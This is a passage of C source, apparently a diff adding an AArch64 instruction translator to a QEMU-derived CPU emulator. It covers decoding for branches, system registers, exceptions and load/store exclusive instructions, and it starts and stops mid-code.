tcg_gen_st16_i32(tcg_ctx, tcg_src, tcg_ctx->cpu_env, vect_off); + break; + case MO_32: + tcg_gen_st_i32(tcg_ctx, tcg_src, tcg_ctx->cpu_env, vect_off); + break; + default: + g_assert_not_reached(); + } +} + +/* Clear the high 64 bits of a 128 bit vector (in general non-quad + * vector ops all need to do this). 
+ */ +static void clear_vec_high(DisasContext *s, int rd) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i64 tcg_zero = tcg_const_i64(tcg_ctx, 0); + + write_vec_element(s, tcg_zero, rd, 1, MO_64); + tcg_temp_free_i64(tcg_ctx, tcg_zero); +} + +/* Store from vector register to memory */ +static void do_vec_st(DisasContext *s, int srcidx, int element, + TCGv_i64 tcg_addr, int size) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGMemOp memop = MO_TE + size; + TCGv_i64 tcg_tmp = tcg_temp_new_i64(tcg_ctx); + + read_vec_element(s, tcg_tmp, srcidx, element, size); + tcg_gen_qemu_st_i64(s->uc, tcg_tmp, tcg_addr, get_mem_index(s), memop); + + tcg_temp_free_i64(tcg_ctx, tcg_tmp); +} + +/* Load from memory to vector register */ +static void do_vec_ld(DisasContext *s, int destidx, int element, + TCGv_i64 tcg_addr, int size) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGMemOp memop = MO_TE + size; + TCGv_i64 tcg_tmp = tcg_temp_new_i64(tcg_ctx); + + tcg_gen_qemu_ld_i64(s->uc, tcg_tmp, tcg_addr, get_mem_index(s), memop); + write_vec_element(s, tcg_tmp, destidx, element, size); + + tcg_temp_free_i64(tcg_ctx, tcg_tmp); +} + +/* Check that FP/Neon access is enabled. If it is, return + * true. If not, emit code to generate an appropriate exception, + * and return false; the caller should not emit any code for + * the instruction. Note that this check must happen after all + * unallocated-encoding checks (otherwise the syndrome information + * for the resulting exception will be incorrect). + */ +static inline bool fp_access_check(DisasContext *s) +{ + assert(!s->fp_access_checked); + s->fp_access_checked = true; + + if (s->cpacr_fpen) { + return true; + } + + gen_exception_insn(s, 4, EXCP_UDEF, syn_fp_access_trap(1, 0xe, false)); + return false; +} + +/* + * This utility function is for doing register extension with an + * optional shift. You will likely want to pass a temporary for the + * destination register. See DecodeRegExtend() in the ARM ARM. 
+ */ +static void ext_and_shift_reg(TCGContext *tcg_ctx, TCGv_i64 tcg_out, TCGv_i64 tcg_in, + int option, unsigned int shift) +{ + int extsize = extract32(option, 0, 2); + bool is_signed = extract32(option, 2, 1); + + if (is_signed) { + switch (extsize) { + case 0: + tcg_gen_ext8s_i64(tcg_ctx, tcg_out, tcg_in); + break; + case 1: + tcg_gen_ext16s_i64(tcg_ctx, tcg_out, tcg_in); + break; + case 2: + tcg_gen_ext32s_i64(tcg_ctx, tcg_out, tcg_in); + break; + case 3: + tcg_gen_mov_i64(tcg_ctx, tcg_out, tcg_in); + break; + } + } else { + switch (extsize) { + case 0: + tcg_gen_ext8u_i64(tcg_ctx, tcg_out, tcg_in); + break; + case 1: + tcg_gen_ext16u_i64(tcg_ctx, tcg_out, tcg_in); + break; + case 2: + tcg_gen_ext32u_i64(tcg_ctx, tcg_out, tcg_in); + break; + case 3: + tcg_gen_mov_i64(tcg_ctx, tcg_out, tcg_in); + break; + } + } + + if (shift) { + tcg_gen_shli_i64(tcg_ctx, tcg_out, tcg_out, shift); + } +} + +static inline void gen_check_sp_alignment(DisasContext *s) +{ + /* The AArch64 architecture mandates that (if enabled via PSTATE + * or SCTLR bits) there is a check that SP is 16-aligned on every + * SP-relative load or store (with an exception generated if it is not). + * In line with general QEMU practice regarding misaligned accesses, + * we omit these checks for the sake of guest program performance. + * This function is provided as a hook so we can more easily add these + * checks in future (possibly as a "favour catching guest program bugs + * over speed" user selectable option). + */ +} + +/* + * This provides a simple table based table lookup decoder. It is + * intended to be used when the relevant bits for decode are too + * awkwardly placed and switch/if based logic would be confusing and + * deeply nested. Since it's a linear search through the table, tables + * should be kept small. + * + * It returns the first handler where insn & mask == pattern, or + * NULL if there is no match. + * The table is terminated by an empty mask (i.e. 
0)
 */
static inline AArch64DecodeFn *lookup_disas_fn(const AArch64DecodeTable *table,
                                               uint32_t insn)
{
    const AArch64DecodeTable *tptr = table;

    /* Linear scan; a zero mask entry terminates the table */
    while (tptr->mask) {
        if ((insn & tptr->mask) == tptr->pattern) {
            return tptr->disas_fn;
        }
        tptr++;
    }
    return NULL;
}

/*
 * the instruction disassembly implemented here matches
 * the instruction encoding classifications in chapter 3 (C3)
 * of the ARM Architecture Reference Manual (DDI0487A_a)
 */

/* C3.2.7 Unconditional branch (immediate)
 *  31 30       26 25                                  0
 * +----+-----------+-------------------------------------+
 * | op | 0 0 1 0 1 |                 imm26               |
 * +----+-----------+-------------------------------------+
 */
static void disas_uncond_b_imm(DisasContext *s, uint32_t insn)
{
    TCGContext *tcg_ctx = s->uc->tcg_ctx;
    /* s->pc has already been advanced past this insn, hence the -4 */
    uint64_t addr = s->pc + sextract32(insn, 0, 26) * 4 - 4;

    if (insn & (1U << 31)) {
        /* C5.6.26 BL Branch with link */
        tcg_gen_movi_i64(tcg_ctx, cpu_reg(s, 30), s->pc);
    }

    /* C5.6.20 B Branch / C5.6.26 BL Branch with link */
    gen_goto_tb(s, 0, addr);
}

/* C3.2.1 Compare & branch (immediate)
 *   31  30         25  24  23                  5 4      0
 * +----+-------------+----+---------------------+--------+
 * | sf | 0 1 1 0 1 0 | op |         imm19       |   Rt   |
 * +----+-------------+----+---------------------+--------+
 */
static void disas_comp_b_imm(DisasContext *s, uint32_t insn)
{
    TCGContext *tcg_ctx = s->uc->tcg_ctx;
    unsigned int sf, op, rt;
    uint64_t addr;
    int label_match;
    TCGv_i64 tcg_cmp;

    sf = extract32(insn, 31, 1);
    op = extract32(insn, 24, 1); /* 0: CBZ; 1: CBNZ */
    rt = extract32(insn, 0, 5);
    addr = s->pc + sextract32(insn, 5, 19) * 4 - 4;

    tcg_cmp = read_cpu_reg(s, rt, sf);
    label_match = gen_new_label(tcg_ctx);

    tcg_gen_brcondi_i64(tcg_ctx, op ? TCG_COND_NE : TCG_COND_EQ,
                        tcg_cmp, 0, label_match);

    /* Fall-through path: branch not taken, continue at next insn */
    gen_goto_tb(s, 0, s->pc);
    gen_set_label(tcg_ctx, label_match);
    gen_goto_tb(s, 1, addr);
}

/* C3.2.5 Test & branch (immediate)
 *   31  30         25  24  23   19 18          5 4    0
 * +----+-------------+----+-------+-------------+------+
 * | b5 | 0 1 1 0 1 1 | op |  b40  |    imm14    |  Rt  |
 * +----+-------------+----+-------+-------------+------+
 */
static void disas_test_b_imm(DisasContext *s, uint32_t insn)
{
    TCGContext *tcg_ctx = s->uc->tcg_ctx;
    unsigned int bit_pos, op, rt;
    uint64_t addr;
    int label_match;
    TCGv_i64 tcg_cmp;

    /* Bit to test is b5:b40 (0..63) */
    bit_pos = (extract32(insn, 31, 1) << 5) | extract32(insn, 19, 5);
    op = extract32(insn, 24, 1); /* 0: TBZ; 1: TBNZ */
    addr = s->pc + sextract32(insn, 5, 14) * 4 - 4;
    rt = extract32(insn, 0, 5);

    tcg_cmp = tcg_temp_new_i64(tcg_ctx);
    tcg_gen_andi_i64(tcg_ctx, tcg_cmp, cpu_reg(s, rt), (1ULL << bit_pos));
    label_match = gen_new_label(tcg_ctx);
    tcg_gen_brcondi_i64(tcg_ctx, op ? TCG_COND_NE : TCG_COND_EQ,
                        tcg_cmp, 0, label_match);
    tcg_temp_free_i64(tcg_ctx, tcg_cmp);
    gen_goto_tb(s, 0, s->pc);
    gen_set_label(tcg_ctx, label_match);
    gen_goto_tb(s, 1, addr);
}

/* C3.2.2 / C5.6.19 Conditional branch (immediate)
 *  31           25  24  23                  5   4  3    0
 * +---------------+----+---------------------+----+------+
 * | 0 1 0 1 0 1 0 | o1 |         imm19       | o0 | cond |
 * +---------------+----+---------------------+----+------+
 */
static void disas_cond_b_imm(DisasContext *s, uint32_t insn)
{
    TCGContext *tcg_ctx = s->uc->tcg_ctx;
    unsigned int cond;
    uint64_t addr;

    /* o0 and o1 must both be zero */
    if ((insn & (1 << 4)) || (insn & (1 << 24))) {
        unallocated_encoding(s);
        return;
    }
    addr = s->pc + sextract32(insn, 5, 19) * 4 - 4;
    cond = extract32(insn, 0, 4);

    if (cond < 0x0e) {
        /* genuinely conditional branches */
        int label_match = gen_new_label(tcg_ctx);
        arm_gen_test_cc(tcg_ctx, cond, label_match);
        gen_goto_tb(s, 0, s->pc);
        gen_set_label(tcg_ctx, label_match);
        gen_goto_tb(s, 1, addr);
    } else {
        /* 0xe and 0xf are both "always" conditions */
        gen_goto_tb(s, 0, addr);
    }
}

/* C5.6.68 HINT */
static void handle_hint(DisasContext *s, uint32_t insn,
                        unsigned int op1, unsigned int op2, unsigned int crm)
{
    unsigned int selector = crm << 3 | op2;

    if (op1 != 3) {
        unallocated_encoding(s);
        return;
    }

    switch (selector) {
    case 0: /* NOP */
        return;
    case 3: /* WFI */
        s->is_jmp = DISAS_WFI;
        return;
    case 1: /* YIELD */
    case 2: /* WFE */
        /* NOTE: YIELD is treated the same as WFE here */
        s->is_jmp = DISAS_WFE;
        return;
    case 4: /* SEV */
    case 5: /* SEVL */
        /* we treat all as NOP at least for now */
        return;
    default:
        /* default specified as NOP equivalent */
        return;
    }
}

/* Drop the exclusive monitor by invalidating the tracked address */
static void gen_clrex(DisasContext *s, uint32_t insn)
{
    TCGContext *tcg_ctx = s->uc->tcg_ctx;
    tcg_gen_movi_i64(tcg_ctx, tcg_ctx->cpu_exclusive_addr, -1);
}

/* CLREX, DSB, DMB, ISB */
static void handle_sync(DisasContext *s, uint32_t insn,
                        unsigned int op1, unsigned int op2, unsigned int crm)
{
    if (op1 != 3) {
        unallocated_encoding(s);
        return;
    }

    switch (op2) {
    case 2: /* CLREX */
        gen_clrex(s, insn);
        return;
    case 4: /* DSB */
    case 5: /* DMB */
    case 6: /* ISB */
        /* We don't emulate caches so barriers are no-ops */
        return;
    default:
        unallocated_encoding(s);
        return;
    }
}

/* C5.6.130 MSR (immediate) - move immediate to processor state field */
static void handle_msr_i(DisasContext *s, uint32_t insn,
                         unsigned int op1, unsigned int op2, unsigned int crm)
{
    TCGContext *tcg_ctx = s->uc->tcg_ctx;
    int op = op1 << 3 | op2;
    switch (op) {
    case 0x05: /* SPSel */
        if (s->current_el == 0) {
            unallocated_encoding(s);
            return;
        }
        /* fall through */
    case 0x1e: /* DAIFSet */
    case 0x1f: /* DAIFClear */
    {
        TCGv_i32 tcg_imm = tcg_const_i32(tcg_ctx, crm);
        TCGv_i32 tcg_op = tcg_const_i32(tcg_ctx, op);
        /* Helper may raise; make the PC of this insn visible first */
        gen_a64_set_pc_im(s, s->pc - 4);
        gen_helper_msr_i_pstate(tcg_ctx, tcg_ctx->cpu_env, tcg_op, tcg_imm);
        tcg_temp_free_i32(tcg_ctx, tcg_imm);
        tcg_temp_free_i32(tcg_ctx, tcg_op);
        /* PSTATE changed: end the TB so the new state takes effect */
        s->is_jmp = DISAS_UPDATE;
        break;
    }
    default:
        unallocated_encoding(s);
        return;
    }
}

/* Pack the CPU's split NZCV flag state into AArch64 NZCV layout (bits 31..28) */
static void gen_get_nzcv(TCGContext *tcg_ctx, TCGv_i64 tcg_rt)
{
    TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx);
    TCGv_i32 nzcv = tcg_temp_new_i32(tcg_ctx);

    /* build bit 31, N */
    tcg_gen_andi_i32(tcg_ctx, nzcv, tcg_ctx->cpu_NF, (1U << 31));
    /* build bit 30, Z */
    tcg_gen_setcondi_i32(tcg_ctx, TCG_COND_EQ, tmp, tcg_ctx->cpu_ZF, 0);
    tcg_gen_deposit_i32(tcg_ctx, nzcv, nzcv, tmp, 30, 1);
    /* build bit 29, C */
    tcg_gen_deposit_i32(tcg_ctx, nzcv, nzcv, tcg_ctx->cpu_CF, 29, 1);
    /* build bit 28, V */
    tcg_gen_shri_i32(tcg_ctx, tmp, tcg_ctx->cpu_VF, 31);
    tcg_gen_deposit_i32(tcg_ctx, nzcv, nzcv, tmp, 28, 1);
    /* generate result */
    tcg_gen_extu_i32_i64(tcg_ctx, tcg_rt, nzcv);

    tcg_temp_free_i32(tcg_ctx, nzcv);
    tcg_temp_free_i32(tcg_ctx, tmp);
}

/* Unpack AArch64 NZCV layout from R[t] into the CPU's split flag state */
static void gen_set_nzcv(TCGContext *tcg_ctx, TCGv_i64 tcg_rt)

{
    TCGv_i32 nzcv = tcg_temp_new_i32(tcg_ctx);

    /* take NZCV from R[t] */
    tcg_gen_trunc_i64_i32(tcg_ctx, nzcv, tcg_rt);

    /* bit 31, N */
    tcg_gen_andi_i32(tcg_ctx, tcg_ctx->cpu_NF, nzcv, (1U << 31));
    /* bit 30, Z (cpu_ZF is "zero iff Z set", hence the setcond inversion) */
    tcg_gen_andi_i32(tcg_ctx, tcg_ctx->cpu_ZF, nzcv, (1 << 30));
    tcg_gen_setcondi_i32(tcg_ctx, TCG_COND_EQ, tcg_ctx->cpu_ZF, tcg_ctx->cpu_ZF, 0);
    /* bit 29, C */
    tcg_gen_andi_i32(tcg_ctx, tcg_ctx->cpu_CF, nzcv, (1 << 29));
    tcg_gen_shri_i32(tcg_ctx, tcg_ctx->cpu_CF, tcg_ctx->cpu_CF, 29);
    /* bit 28, V (cpu_VF keeps V in bit 31, hence the shift to 28+3) */
    tcg_gen_andi_i32(tcg_ctx, tcg_ctx->cpu_VF, nzcv, (1 << 28));
    tcg_gen_shli_i32(tcg_ctx, tcg_ctx->cpu_VF, tcg_ctx->cpu_VF, 3);
    tcg_temp_free_i32(tcg_ctx, nzcv);
}

/* C5.6.129 MRS - move from system register
 * C5.6.131 MSR (register) - move to system register
 * C5.6.204 SYS
 * C5.6.205 SYSL
 * These are all essentially the same insn in 'read' and 'write'
 * versions, with varying op0 fields.
 */
static void handle_sys(DisasContext *s, uint32_t insn, bool isread,
                       unsigned int op0, unsigned int op1, unsigned int op2,
                       unsigned int crn, unsigned int crm, unsigned int rt)
{
    TCGContext *tcg_ctx = s->uc->tcg_ctx;
    const ARMCPRegInfo *ri;
    TCGv_i64 tcg_rt;

    ri = get_arm_cp_reginfo(s->cp_regs,
                            ENCODE_AA64_CP_REG(CP_REG_ARM64_SYSREG_CP,
                                               crn, crm, op0, op1, op2));

    if (!ri) {
        /* Unknown register; this might be a guest error or a QEMU
         * unimplemented feature.
         */
        qemu_log_mask(LOG_UNIMP, "%s access to unsupported AArch64 "
                      "system register op0:%d op1:%d crn:%d crm:%d op2:%d\n",
                      isread ? "read" : "write", op0, op1, crn, crm, op2);
        unallocated_encoding(s);
        return;
    }

    /* Check access permissions */
    if (!cp_access_ok(s->current_el, ri, isread)) {
        unallocated_encoding(s);
        return;
    }

    if (ri->accessfn) {
        /* Emit code to perform further access permissions checks at
         * runtime; this may result in an exception.
         */
        TCGv_ptr tmpptr;
        TCGv_i32 tcg_syn;
        uint32_t syndrome;

        gen_a64_set_pc_im(s, s->pc - 4);
        tmpptr = tcg_const_ptr(tcg_ctx, ri);
        syndrome = syn_aa64_sysregtrap(op0, op1, op2, crn, crm, rt, isread);
        tcg_syn = tcg_const_i32(tcg_ctx, syndrome);
        gen_helper_access_check_cp_reg(tcg_ctx, tcg_ctx->cpu_env, tmpptr, tcg_syn);
        tcg_temp_free_ptr(tcg_ctx, tmpptr);
        tcg_temp_free_i32(tcg_ctx, tcg_syn);
    }

    /* Handle special cases first */
    switch (ri->type & ~(ARM_CP_FLAG_MASK & ~ARM_CP_SPECIAL)) {
    case ARM_CP_NOP:
        return;
    case ARM_CP_NZCV:
        tcg_rt = cpu_reg(s, rt);
        if (isread) {
            gen_get_nzcv(tcg_ctx, tcg_rt);
        } else {
            gen_set_nzcv(tcg_ctx, tcg_rt);
        }
        return;
    case ARM_CP_CURRENTEL:
        /* Reads as current EL value from pstate, which is
         * guaranteed to be constant by the tb flags.
         */
        tcg_rt = cpu_reg(s, rt);
        tcg_gen_movi_i64(tcg_ctx, tcg_rt, s->current_el << 2);
        return;
    case ARM_CP_DC_ZVA:
        /* Writes clear the aligned block of memory which rt points into. */
        tcg_rt = cpu_reg(s, rt);
        gen_helper_dc_zva(tcg_ctx, tcg_ctx->cpu_env, tcg_rt);
        return;
    default:
        break;
    }

    tcg_rt = cpu_reg(s, rt);

    if (isread) {
        if (ri->type & ARM_CP_CONST) {
            tcg_gen_movi_i64(tcg_ctx, tcg_rt, ri->resetvalue);
        } else if (ri->readfn) {
            TCGv_ptr tmpptr;
            tmpptr = tcg_const_ptr(tcg_ctx, ri);
            gen_helper_get_cp_reg64(tcg_ctx, tcg_rt, tcg_ctx->cpu_env, tmpptr);
            tcg_temp_free_ptr(tcg_ctx, tmpptr);
        } else {
            /* Plain field: read directly out of the CPU env struct */
            tcg_gen_ld_i64(tcg_ctx, tcg_rt, tcg_ctx->cpu_env, ri->fieldoffset);
        }
    } else {
        if (ri->type & ARM_CP_CONST) {
            /* If not forbidden by access permissions, treat as WI */
            return;
        } else if (ri->writefn) {
            TCGv_ptr tmpptr;
            tmpptr = tcg_const_ptr(tcg_ctx, ri);
            gen_helper_set_cp_reg64(tcg_ctx, tcg_ctx->cpu_env, tmpptr, tcg_rt);
            tcg_temp_free_ptr(tcg_ctx, tmpptr);
        } else {
            tcg_gen_st_i64(tcg_ctx, tcg_rt, tcg_ctx->cpu_env, ri->fieldoffset);
        }
    }

    if (!isread && !(ri->type & ARM_CP_SUPPRESS_TB_END)) {
        /* We default to ending the TB on a coprocessor register write,
         * but allow this to be suppressed by the register definition
         * (usually only necessary to work around guest bugs).
         */
        s->is_jmp = DISAS_UPDATE;
    }
}

/* C3.2.4 System
 *  31                 22 21  20 19 18 16 15   12 11    8 7   5 4    0
 * +---------------------+---+-----+-----+-------+-------+-----+------+
 * | 1 1 0 1 0 1 0 1 0 0 | L | op0 | op1 |  CRn  |  CRm  | op2 |  Rt  |
 * +---------------------+---+-----+-----+-------+-------+-----+------+
 */
static void disas_system(DisasContext *s, uint32_t insn)
{
    unsigned int l, op0, op1, crn, crm, op2, rt;
    l = extract32(insn, 21, 1);
    op0 = extract32(insn, 19, 2);
    op1 = extract32(insn, 16, 3);
    crn = extract32(insn, 12, 4);
    crm = extract32(insn, 8, 4);
    op2 = extract32(insn, 5, 3);
    rt = extract32(insn, 0, 5);

    if (op0 == 0) {
        /* op0 == 0: HINT/barrier/MSR-immediate space, Rt must be 31 */
        if (l || rt != 31) {
            unallocated_encoding(s);
            return;
        }
        switch (crn) {
        case 2: /* C5.6.68 HINT */
            handle_hint(s, insn, op1, op2, crm);
            break;
        case 3: /* CLREX, DSB, DMB, ISB */
            handle_sync(s, insn, op1, op2, crm);
            break;
        case 4: /* C5.6.130 MSR (immediate) */
            handle_msr_i(s, insn, op1, op2, crm);
            break;
        default:
            unallocated_encoding(s);
            break;
        }
        return;
    }
    handle_sys(s, insn, l, op0, op1, op2, crn, crm, rt);
}

/* C3.2.3 Exception generation
 *
 *  31             24 23 21 20                     5 4   2 1  0
 * +-----------------+-----+------------------------+-----+----+
 * | 1 1 0 1 0 1 0 0 | opc |          imm16         | op2 | LL |
 * +-----------------------+------------------------+----------+
 */
static void disas_exc(DisasContext *s, uint32_t insn)
{
    TCGContext *tcg_ctx = s->uc->tcg_ctx;
    int opc = extract32(insn, 21, 3);
    int op2_ll = extract32(insn, 0, 5);
    int imm16 = extract32(insn, 5, 16);
    TCGv_i32 tmp;

    switch (opc) {
    case 0:
        /* For SVC, HVC and SMC we advance the single-step state
         * machine before taking the exception. This is architecturally
         * mandated, to ensure that single-stepping a system call
         * instruction works properly.
         */
        switch (op2_ll) {
        case 1: /* SVC */
            gen_ss_advance(s);
            gen_exception_insn(s, 0, EXCP_SWI, syn_aa64_svc(imm16));
            break;
        case 2: /* HVC */
            if (s->current_el == 0) {
                unallocated_encoding(s);
                break;
            }
            /* The pre HVC helper handles cases when HVC gets trapped
             * as an undefined insn by runtime configuration.
             */
            gen_a64_set_pc_im(s, s->pc - 4);
            gen_helper_pre_hvc(tcg_ctx, tcg_ctx->cpu_env);
            gen_ss_advance(s);
            gen_exception_insn(s, 0, EXCP_HVC, syn_aa64_hvc(imm16));
            break;
        case 3: /* SMC */
            if (s->current_el == 0) {
                unallocated_encoding(s);
                break;
            }
            gen_a64_set_pc_im(s, s->pc - 4);
            tmp = tcg_const_i32(tcg_ctx, syn_aa64_smc(imm16));
            gen_helper_pre_smc(tcg_ctx, tcg_ctx->cpu_env, tmp);
            tcg_temp_free_i32(tcg_ctx, tmp);
            gen_ss_advance(s);
            gen_exception_insn(s, 0, EXCP_SMC, syn_aa64_smc(imm16));
            break;
        default:
            unallocated_encoding(s);
            break;
        }
        break;
    case 1:
        if (op2_ll != 0) {
            unallocated_encoding(s);
            break;
        }
        /* BRK */
        gen_exception_insn(s, 4, EXCP_BKPT, syn_aa64_bkpt(imm16));
        break;
    case 2:
        if (op2_ll != 0) {
            unallocated_encoding(s);
            break;
        }
        /* HLT */
        unsupported_encoding(s, insn);
        break;
    case 5:
        if (op2_ll < 1 || op2_ll > 3) {
            unallocated_encoding(s);
            break;
        }
        /* DCPS1, DCPS2, DCPS3 */
        unsupported_encoding(s, insn);
        break;
    default:
        unallocated_encoding(s);
        break;
    }
}

/* C3.2.7 Unconditional branch (register)
 *  31           25 24   21 20   16 15   10 9    5 4     0
 * +---------------+-------+-------+-------+------+-------+
 * | 1 1 0 1 0 1 1 |  opc  |  op2  |  op3  |  Rn  |  op4  |
 * +---------------+-------+-------+-------+------+-------+
 */
static void disas_uncond_b_reg(DisasContext *s, uint32_t insn)
{
    TCGContext *tcg_ctx = s->uc->tcg_ctx;
    unsigned int opc, op2, op3, rn, op4;

    opc = extract32(insn, 21, 4);
    op2 = extract32(insn, 16, 5);
    op3 = extract32(insn, 10, 6);
    rn = extract32(insn, 5, 5);
    op4 = extract32(insn, 0, 5);

    if (op4 != 0x0 || op3 != 0x0 || op2 != 0x1f) {
        unallocated_encoding(s);
        return;
    }

    switch (opc) {
    case 0: /* BR */
    case 2: /* RET */
        tcg_gen_mov_i64(tcg_ctx, tcg_ctx->cpu_pc, cpu_reg(s, rn));
        break;
    case 1: /* BLR */
        tcg_gen_mov_i64(tcg_ctx, tcg_ctx->cpu_pc, cpu_reg(s, rn));
        tcg_gen_movi_i64(tcg_ctx, cpu_reg(s, 30), s->pc);
        break;
    case 4: /* ERET */
        if (s->current_el == 0) {
            unallocated_encoding(s);
            return;
        }
        gen_helper_exception_return(tcg_ctx, tcg_ctx->cpu_env);
        s->is_jmp = DISAS_JUMP;
        return;
    case 5: /* DRPS */
        if (rn != 0x1f) {
            unallocated_encoding(s);
        } else {
            unsupported_encoding(s, insn);
        }
        return;
    default:
        unallocated_encoding(s);
        return;
    }

    s->is_jmp = DISAS_JUMP;
}

/* C3.2 Branches, exception generating and system instructions */
static void disas_b_exc_sys(DisasContext *s, uint32_t insn)
{
    switch (extract32(insn, 25, 7)) {
    case 0x0a: case 0x0b:
    case 0x4a: case 0x4b: /* Unconditional branch (immediate) */
        disas_uncond_b_imm(s, insn);
        break;
    case 0x1a: case 0x5a: /* Compare & branch (immediate) */
        disas_comp_b_imm(s, insn);
        break;
    case 0x1b: case 0x5b: /* Test & branch (immediate) */
        disas_test_b_imm(s, insn);
        break;
    case 0x2a: /* Conditional branch (immediate) */
        disas_cond_b_imm(s, insn);
        break;
    case 0x6a: /* Exception generation / System */
        if (insn & (1 << 24)) {
            disas_system(s, insn);
        } else {
            disas_exc(s, insn);
        }
        break;
    case 0x6b: /* Unconditional branch (register) */
        disas_uncond_b_reg(s, insn);
        break;
    default:
        unallocated_encoding(s);
        break;
    }
}

/*
 * Load/Store exclusive instructions are implemented by remembering
 * the value/address loaded, and seeing if these are the same
 * when the store is performed. This is not actually the architecturally
 * mandated semantics, but it works for typical guest code sequences
 * and avoids having to monitor regular stores.
+ * + * In system emulation mode only one CPU will be running at once, so + * this sequence is effectively atomic. In user emulation mode we + * throw an exception and handle the atomic operation elsewhere. + */ +static void gen_load_exclusive(DisasContext *s, int rt, int rt2, + TCGv_i64 addr, int size, bool is_pair) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i64 tmp = tcg_temp_new_i64(tcg_ctx); + TCGMemOp memop = MO_TE + size; + + g_assert(size <= 3); + tcg_gen_qemu_ld_i64(s->uc, tmp, addr, get_mem_index(s), memop); + + if (is_pair) { + TCGv_i64 addr2 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 hitmp = tcg_temp_new_i64(tcg_ctx); + + g_assert(size >= 2); + tcg_gen_addi_i64(tcg_ctx, addr2, addr, 1ULL << size); + tcg_gen_qemu_ld_i64(s->uc, hitmp, addr2, get_mem_index(s), memop); + tcg_temp_free_i64(tcg_ctx, addr2); + tcg_gen_mov_i64(tcg_ctx, tcg_ctx->cpu_exclusive_high, hitmp); + tcg_gen_mov_i64(tcg_ctx, cpu_reg(s, rt2), hitmp); + tcg_temp_free_i64(tcg_ctx, hitmp); + } + + tcg_gen_mov_i64(tcg_ctx, tcg_ctx->cpu_exclusive_val, tmp); + tcg_gen_mov_i64(tcg_ctx, cpu_reg(s, rt), tmp); + + tcg_temp_free_i64(tcg_ctx, tmp); + tcg_gen_mov_i64(tcg_ctx, tcg_ctx->cpu_exclusive_addr, addr); +} + +#ifdef CONFIG_USER_ONLY +static void gen_store_exclusive(DisasContext *s, int rd, int rt, int rt2, + TCGv_i64 addr, int size, int is_pair) +{ + tcg_gen_mov_i64(tcg_ctx, cpu_exclusive_test, addr); + tcg_gen_movi_i32(tcg_ctx, cpu_exclusive_info, + size | is_pair << 2 | (rd << 4) | (rt << 9) | (rt2 << 14)); + gen_exception_internal_insn(s, 4, EXCP_STREX); +} +#else +static void gen_store_exclusive(DisasContext *s, int rd, int rt, int rt2, + TCGv_i64 inaddr, int size, int is_pair) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + /* if (env->exclusive_addr == addr && env->exclusive_val == [addr] + * && (!is_pair || env->exclusive_high == [addr + datasize])) { + * [addr] = {Rt}; + * if (is_pair) { + * [addr + datasize] = {Rt2}; + * } + * {Rd} = 0; + * } else { + * {Rd} = 1; + * } + * 
env->exclusive_addr = -1; + */ + int fail_label = gen_new_label(tcg_ctx); + int done_label = gen_new_label(tcg_ctx); + TCGv_i64 addr = tcg_temp_local_new_i64(tcg_ctx); + TCGv_i64 tmp; + + /* Copy input into a local temp so it is not trashed when the + * basic block ends at the branch insn. + */ + tcg_gen_mov_i64(tcg_ctx, addr, inaddr); + tcg_gen_brcond_i64(tcg_ctx, TCG_COND_NE, addr, tcg_ctx->cpu_exclusive_addr, fail_label); + + tmp = tcg_temp_new_i64(tcg_ctx); + tcg_gen_qemu_ld_i64(s->uc, tmp, addr, get_mem_index(s), MO_TE + size); + tcg_gen_brcond_i64(tcg_ctx, TCG_COND_NE, tmp, tcg_ctx->cpu_exclusive_val, fail_label); + tcg_temp_free_i64(tcg_ctx, tmp); + + if (is_pair) { + TCGv_i64 addrhi = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 tmphi = tcg_temp_new_i64(tcg_ctx); + + tcg_gen_addi_i64(tcg_ctx, addrhi, addr, 1ULL << size); + tcg_gen_qemu_ld_i64(s->uc, tmphi, addrhi, get_mem_index(s), MO_TE + size); + tcg_gen_brcond_i64(tcg_ctx, TCG_COND_NE, tmphi, tcg_ctx->cpu_exclusive_high, fail_label); + + tcg_temp_free_i64(tcg_ctx, tmphi); + tcg_temp_free_i64(tcg_ctx, addrhi); + } + + /* We seem to still have the exclusive monitor, so do the store */ + tcg_gen_qemu_st_i64(s->uc, cpu_reg(s, rt), addr, get_mem_index(s), MO_TE + size); + if (is_pair) { + TCGv_i64 addrhi = tcg_temp_new_i64(tcg_ctx); + + tcg_gen_addi_i64(tcg_ctx, addrhi, addr, 1ULL << size); + tcg_gen_qemu_st_i64(s->uc, cpu_reg(s, rt2), addrhi, + get_mem_index(s), MO_TE + size); + tcg_temp_free_i64(tcg_ctx, addrhi); + } + + tcg_temp_free_i64(tcg_ctx, addr); + + tcg_gen_movi_i64(tcg_ctx, cpu_reg(s, rd), 0); + tcg_gen_br(tcg_ctx, done_label); + gen_set_label(tcg_ctx, fail_label); + tcg_gen_movi_i64(tcg_ctx, cpu_reg(s, rd), 1); + gen_set_label(tcg_ctx, done_label); + tcg_gen_movi_i64(tcg_ctx, tcg_ctx->cpu_exclusive_addr, -1); + +} +#endif + +/* C3.3.6 Load/store exclusive + * + * 31 30 29 24 23 22 21 20 16 15 14 10 9 5 4 0 + * +-----+-------------+----+---+----+------+----+-------+------+------+ + * | sz | 0 0 1 0 0 0 | 
o2 | L | o1 | Rs | o0 | Rt2 | Rn | Rt | + * +-----+-------------+----+---+----+------+----+-------+------+------+ + * + * sz: 00 -> 8 bit, 01 -> 16 bit, 10 -> 32 bit, 11 -> 64 bit + * L: 0 -> store, 1 -> load + * o2: 0 -> exclusive, 1 -> not + * o1: 0 -> single register, 1 -> register pair + * o0: 1 -> load-acquire/store-release, 0 -> not + * + * o0 == 0 AND o2 == 1 is un-allocated + * o1 == 1 is un-allocated except for 32 and 64 bit sizes + */ +static void disas_ldst_excl(DisasContext *s, uint32_t insn) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int rt = extract32(insn, 0, 5); + int rn = extract32(insn, 5, 5); + int rt2 = extract32(insn, 10, 5); + int is_lasr = extract32(insn, 15, 1); + int rs = extract32(insn, 16, 5); + int is_pair = extract32(insn, 21, 1); + int is_store = !extract32(insn, 22, 1); + int is_excl = !extract32(insn, 23, 1); + int size = extract32(insn, 30, 2); + TCGv_i64 tcg_addr; + + if ((!is_excl && !is_lasr) || + (is_pair && size < 